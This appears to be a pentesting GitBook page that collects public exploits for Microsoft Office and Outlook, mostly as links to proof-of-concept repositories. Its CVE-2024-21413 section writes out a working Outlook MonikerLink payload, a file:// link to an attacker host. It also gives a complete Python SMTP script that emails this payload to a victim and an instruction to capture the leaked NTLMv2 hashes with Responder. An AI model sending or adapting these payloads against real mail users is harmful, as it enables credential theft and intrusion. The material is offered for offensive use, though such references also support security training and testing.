Microsoft Office & Outlook

Office and Outlook Exploitation - Public Exploits

Follina - Office RCE

GitHub - chvancooten/follina.py: POC to replicate the full 'Follina' Office RCE vulnerability for testing purposesGitHub

CVE-2024-38200 - Microsoft Office NTLMv2 Disclosure Vulnerability

GitHub - passtheticket/CVE-2024-38200: CVE-2024-38200 - Microsoft Office NTLMv2 Disclosure VulnerabilityGitHub

CVE-2024-21413 - Microsoft Outlook RCE

<p><a href="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>

CVE-2024-21413 (CVSS 9.8): Critical Outlook Flaw Under Active Attack, PoC AvailableCybersecurity News

GitHub - xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability: Microsoft-Outlook-Remote-Code-Execution-VulnerabilityGitHub

GitHub - duy-31/CVE-2024-21413: Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POCGitHub

'''
Author: CMNatic | https://github.com/cmnatic
Version: 1.0 | 19/02/2024
'''

import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr

sender_email = 'attacker@monikerlink.thm' # Replace with your sender email address
receiver_email = 'victim@monikerlink.thm' # Replace with the recipient email address
password = input("Enter your attacker email password: ")
html_content = """\
<!DOCTYPE html>
<html lang="en">
    <p><a href="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>

    </body>
</html>"""

message = MIMEMultipart()
message['Subject'] = "CVE-2024-21413"
message["From"] = formataddr(('CMNatic', sender_email))
message["To"] = receiver_email

# Convert the HTML string into bytes and attach it to the message object
msgHtml = MIMEText(html_content,'html')
message.attach(msgHtml)

server = smtplib.SMTP('MAILSERVER', 25)
server.ehlo()
try:
    server.login(sender_email, password)
except Exception as err:
    print(err)
    exit(-1)

try:
    server.sendmail(sender_email, [receiver_email], message.as_string())
    print("\n Email delivered")
except Exception as error:
    print(error)
finally:
    server.quit()

On attacker host, run Responder to capture NTLMv2 Hash

CVE-2023-23397 - Microsoft Outlook NTLM Leakage

GitHub - api0cradle/CVE-2023-23397-POC-PowershellGitHub

GitHub - Trackflaw/CVE-2023-23397: Simple PoC of the CVE-2023-23397 vulnerability with the payload sent by email.GitHub

Guidance for investigating attacks using CVE-2023-23397 - Microsoft Security BlogMicrosoft Security Blog

CVE-2023-35636 - Microsoft Outlook Information Disclosure Vulnerability (leak password hash)

GitHub - duy-31/CVE-2023-35636: Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POCGitHub

Outlook - Pwnlook

GitHub - amjcyber/pwnlook: An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it.GitHub

Interesting Book

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Pentesting Active Directory and Windows-based Infrastructure Enhance your skill set to pentest against real-world Microsoft infrastructure with hands-on exercises and by following attack/detect guidelines with OpSec considerations
Infrastructure Attack Strategies for Ethical Hacking Encompassing both external and internal enumeration techniques, the book delves into attacking routers and services, establishing footholds, privilege escalation, lateral movement, and exploiting databases and Active Directory.
RTFM: Red Team Field Manual v2 A quick reference when there is no time to scour the Internet for that perfect command
Red Team Development and Operations: A practical guide The authors have moved beyond SANS training and use this book to detail red team operations in a practical guide.
Cybersecurity Attacks – Red Team Strategies A practical guide to building a penetration testing program having homefield advantage

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousEnumeration from Linux Host NextMicrosoft SharePoint

Last updated 18 days ago